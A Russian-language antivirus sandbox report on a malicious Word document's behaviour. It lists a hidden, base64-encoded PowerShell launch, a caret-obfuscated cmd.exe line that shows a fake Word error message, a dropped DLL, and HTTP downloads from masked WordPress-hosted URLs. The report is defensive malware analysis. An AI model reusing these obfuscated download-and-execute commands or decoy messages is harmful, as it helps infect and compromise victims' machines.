Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD cwB2ACAAKAAnAEwAJwArACcARwA3AHYAJwApACAAIAAoAFsAdAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiAC0AZgAnAHMAeQAnACwAJwBPAC4AZABpACcALAAnAHMAVABlAE0A...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\bs_c8n2\vn9sgd5\d68s.dll
Удаляет следующие файлы
- %HOMEPATH%\bs_c8n2\vn9sgd5\d68s.dll
Подменяет следующие файлы
- %HOMEPATH%\bs_c8n2\vn9sgd5\d68s.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://av##pr.com/wp-includes/hJ/
- http://www.su####canada.xyz/wp-content/0sDDTy/
UDP
- DNS ASK av##pr.com
- DNS ASK ul#####esoftwarenet.com
- DNS ASK su#####arhmirror.com
- DNS ASK ca##da.com
- DNS ASK hi###gym.com
- DNS ASK yu###maku.com
- DNS ASK su####canada.xyz
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwB2ACAAKAAnAEwAJwArACcARwA3AHYAJwApACAAIAAoAFsAdAB5AFAAZ...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
